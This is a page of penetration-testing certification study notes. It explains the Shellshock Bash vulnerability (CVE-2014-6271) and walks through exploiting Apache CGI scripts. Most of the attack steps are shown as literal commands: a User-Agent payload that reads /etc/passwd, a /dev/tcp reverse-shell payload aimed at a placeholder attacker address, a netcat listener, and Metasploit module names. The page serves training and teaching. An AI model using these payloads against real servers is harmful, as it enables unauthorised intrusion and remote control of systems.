👾
Rootkid - Cyber Journal
Portfolio
  • 👩‍🚀Introduction
    • 🤖About Cyber Journal & Rootkid
    • 📜License Agreement
    • ⚠️Disclaimer
  • 📚Exam Prep Notes
    • 🗒️KLCP Exam (PEN-103) - Notes
      • 1. Linux Fundamentals
      • 2. Introduction
      • 3. About Kali Linux
      • 4. Getting Started with Kali Linux
      • 5. Installing Kali Linux
      • 6. Configuring Kali Linux
      • 7. Helping Yourself and Getting Help
      • 8. Securing and Monitoring Kali Linux
      • 9. Debian Package Management
      • 10. Advanced Usage
      • 11. Kali Linux in the Enterprise
      • 12. Introduction to Security Assessments
      • 13. Conclusion: The Road Ahead
    • 📒ISO/IEC 27001:2022 Lead Auditor - Notes
      • ISO - Training - Day - 1
      • ISO - Training - Day - 2
      • ISO - Training - Day - 3
      • ISO - Training - Day - 4
      • Practice Questions - Notes
      • Other PDF References
    • 📑Junior Penetration Tester (eJPTv2) - Notes
      • 💡Assessment Methodologies
        • 🔍Information Gathering
          • 🌏Passive Information Gathering
          • 🧐Active Information Gathering
        • 👣Footprinting & Scanning
          • 🗺️Mapping a Network
          • 🎛️Port Scanning
        • 🕵️Enumeration
          • 📜SMB Enumeration
          • 📂FTP Enumeration
          • 🐚SSH Enumeration
          • 🕸️HTTP Enumeration
          • 🗄️MySQL & MSSQL Enumeration
        • 🐛Vulnerability Assessment
          • 🩸Case Study: Heartbleed Vulnerability (CVE-2014-0160)
          • 🔵Case Study: EternalBlue Vulnerability (CVE-2017-0143)
          • 👨‍💻Case Study: Log4J Vulnerability (CVE-2021-44228)
      • 🧰Assessment Methodologies: Auditing Fundamentals
      • 📶Host & Network Penetration Testing
        • 💻System/Host Based Attacks
          • 🪟Overview Of Windows Vulnerabilities
          • 💣Exploiting Windows Vulnerabilities
            • 🧨Exploiting Microsoft IIS WebDAV
            • 🧨Exploiting WebDAV With Metasploit
            • 🧨Exploiting SMB With PsExec
            • 🧨Exploiting Windows MS17-010 SMB Vulnerability (EternalBlue)
            • 🧨Exploiting RDP - Brute Force
            • 🧨Exploiting Windows CVE-2019-0708 RDP Vulnerability (BlueKeep)
            • 🧨Exploiting WinRM
          • 📈Windows Privilege Escalation
            • 🔥Windows Kernel Exploits
            • 🔥Bypassing UAC With UACMe
            • 🔥Access Token Impersonation
          • 🗃️Windows File System Vulnerability - Alternate Data Streams
          • 💳Windows Credential Dumping
            • 🔑Searching For Passwords In Windows Configuration Files
            • 🔑Dumping Hashes With Mimikatz
            • 🔑Pass-The-Hash Attacks
          • 💎Linux Vulnerabilities
          • 🎰Exploiting Linux Vulnerabilities
            • 🐚Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)
            • 🗄️Exploiting FTP - Linux
            • 🔐Exploiting SSH - Linux
            • 📭Exploiting SAMBA - Linux
          • ‼️Linux Privilege Escalation
            • 💥Linux Kernel Exploits
            • 💥Exploiting Misconfigured Cron Jobs
            • 💥Exploiting SUID Binaries
          • 🔐Linux Credential Dumping
        • 📶Network-Based Attacks
          • 📦Tshark & Filtering Basics
          • 🕷️Arp Poisoning
        • 💣The Metasploit Framework (MSF)
        • 💥Exploitation
          • 🖲️Vulnerability Scanning
          • ⚠️Searching For Exploits
          • 🐚Bind & Reverse Shells
          • 👾Exploitation Frameworks
          • 🪟Windows Exploitation
          • 🥌Linux Exploitation
          • ☣️AV Evasion & Obfuscation
        • 🚩Post-Exploitation
          • 🌬️Windows Local Enumeration
          • 📟Linux Local Enumeration
          • 🚜Transferring Files To Windows & Linux Targets
          • 🔼Upgrading Shells
          • 👀Windows Privilege Escalation
          • ⚒️Linux Privilege Escalation
          • 🔮Windows Persistence
          • 🧙Linux Persistence
          • 〰️Dumping & Cracking Windows Hashes (NTLM Hashes)
          • 🍘Dumping & Cracking Linux Password Hashes
          • ➿Pivoting Overview
          • 🧹Clearing Your Tracks On Windows & Linux
        • 🧑‍🔬Social Engineering Fundamentals
      • 🕸️Web Application Penetration Testing
        • ℹ️Intro to Web
        • 🎯Directory Enumeration
        • 🧰BurpSuite and ZAP-Proxy Overview
        • 🛠️Nikto, SQLMap, XSSer & Hydra Overview
      • 👽Extra Resources
        • ➕CIDR Conversion Table
        • 📦Machines or Lab Solved to Practice
    • 📓Certified in Cybersecurity - (ISC)2 - Notes
      • 📝Chapter-1 Security Controls - Notes
      • 📝Chapter-2 Incident Response, Business Continuity & Disaster Recovery - Notes
      • 📝Chapter 3: Access Control Concepts - Notes
      • 📝Chapter 4: Network Security - Notes
      • 📝Chapter 5: Security Operations - Notes
    • 📕Certified Ethical Hacker v12 - Practical - Notes
      • 👣Module 02: Footprinting and Reconnaissance
      • 🔎Module 03: Enumeration
      • Module 04: Scanning Networks
      • Module 05: Vulnerability Analysis
      • 💻Module 06: System Hacking
      • 🐛Module 07: Malware Threats
      • 🧙Module 08: Sniffing
      • 🐧Module 09: Social Engineering
      • ⚠️Module 10: Denial-of-Service
      • 🪝Module 11: Session Hijacking
      • Module 12: Evading IDS, Firewalls, and Honeypots
      • 🗄️Module 13: Hacking Web Servers
      • Module 14: Hacking Web Applications
      • 💉Module 15: SQL Injection
      • Module 16: Hacking Wireless Networks
      • Module 17: Hacking Mobile Platforms
      • Module 18: IoT and OT Hacking
      • Module 19: Cloud Computing
      • Module 20: Cryptography
      • Extra Resources
        • 📚Helpful Resources
        • 📜Cheat Sheet
  • ✍️Blogs
    • Mastering the Art of Logic Flaws: Unraveling Cyber Mysteries !!!
    • How to write a Detailed Vulnerability Report
    • Payment Gateway Bypass on Government Domain.
Powered by GitBook
On this page
  • CVE-2014-6271 - Shellshock
  • Shellshock Exploitation
  • Attack Flow for Exploiting Shellshock Vulnerability
  • 1. Identify the Target
  • 2. Find the CGI Script
  • 3. Check for Shellshock Vulnerability
  • 4. Set Up Burp Suite
  • 5. Intercept the Request
  • 6. Exploit Shellshock for Reverse Shell
  • 7. Set Up a Listener
  • 8. Send the Exploit Request
  • Worth Noting

Was this helpful?

  1. Exam Prep Notes
  2. Junior Penetration Tester (eJPTv2) - Notes
  3. Host & Network Penetration Testing
  4. System/Host Based Attacks
  5. Exploiting Linux Vulnerabilities

Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)

CVE-2014-6271 - Shellshock

  • Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash shell (since V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.

  • The Shellshock vulnerability was discovered by Stéphane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.

  • Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.

  • The Shellshock vulnerability is caused by a vulnerability in Bash, whereby Bash mistakenly executes trailing commands after a series of characters: () {:;};.

  • This vulnerability only affects Linux as Windows does not use utilize Bash as it is not a *Nix based operating system.

  • In the context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.

  • CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system, after which the output is displayed to the client.

Shellshock Exploitation

  • In order to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash.

  • In the context of an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server.

  • Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.

  • This vulnerability can be exploited both manually and automatically with the use of an MSF exploit module.

Attack Flow for Exploiting Shellshock Vulnerability

1. Identify the Target

Objective: Verify if the target system is running an Apache server.

Tool: Nmap

Command:

nmap -sV <target_ip>

Explanation: This command scans the target IP to identify open ports and services. Look for Apache in the service list.

2. Find the CGI Script

Objective: Determine the path of the CGI script that runs on the server.

Action: Access the web application and examine the page source for the CGI script path.

Explanation: Look for a .cgi or .pl file in the source code. This is the script that you will target for the Shellshock exploit.

3. Check for Shellshock Vulnerability

Objective: Test if the CGI script is vulnerable to the Shellshock exploit.

Action: Use the Nmap script to check for Shellshock vulnerability.

nmap -sV <target_ip> --script=http-shellshock --script-args "http-shellshock.uri=<cgi_file_path>"

Explanation: This command uses the http-shellshock script to test the specified CGI script for the Shellshock vulnerability.

4. Set Up Burp Suite

Objective: Intercept and modify the HTTP request to exploit Shellshock.

Action: Configure Burp Suite to act as a proxy for your browser.

Explanation: This will allow you to capture and manipulate HTTP requests to the server.

5. Intercept the Request

Objective: Modify the HTTP request to include the Shellshock payload.

Action: Use Burp Suite’s Repeater tool to forward the captured request.

Payload for Checking Vulnerability:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'

Explanation: This payload checks if the server is vulnerable by attempting to execute a command to read the /etc/passwd file.

6. Exploit Shellshock for Reverse Shell

Objective: Gain a reverse shell on the target server.

Action: Use the following payload to create a reverse shell.

Payload for Reverse Shell:

User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/<your_ip>/<your_port> 0>&1'

Explanation: This payload initiates a reverse shell connection from the target server to your machine.

7. Set Up a Listener

Objective: Prepare your system to receive the reverse shell connection.

Action: Run a Netcat listener on your machine.

nc -nvlp 1234

Explanation: This command listens for incoming connections on port 1234. Adjust the port number if needed.

8. Send the Exploit Request

Objective: Trigger the Shellshock exploit to establish the reverse shell.

Action: Send the modified HTTP request with the reverse shell payload through Burp Suite.

Explanation: Once sent, the target server will connect back to your Netcat listener, providing you with a reverse shell.

Worth Noting

It's worth noting that this vulnerability can also be exploited using the Metasploit framework. There are two modules available:

  1. auxiliary/scanner/http/apache_mod_cgi_bash_env: This module checks for the presence of CGI scripts and whether the server is vulnerable to the Shellshock exploit.

  2. exploit/multi/http/apache_mod_cgi_bash_env_exe: This module exploits the Shellshock vulnerability to gain a reverse shell using Meterpreter.




Hacker's Mantra:I really didn’t understand why hackers would want to hack into a classroom. Are they going to learn algebra? Maybe calculus? - Eric Yuan

PreviousExploiting Linux VulnerabilitiesNextExploiting FTP - Linux

Last updated 11 months ago

Was this helpful?

📚
📑
📶
💻
🎰
🐚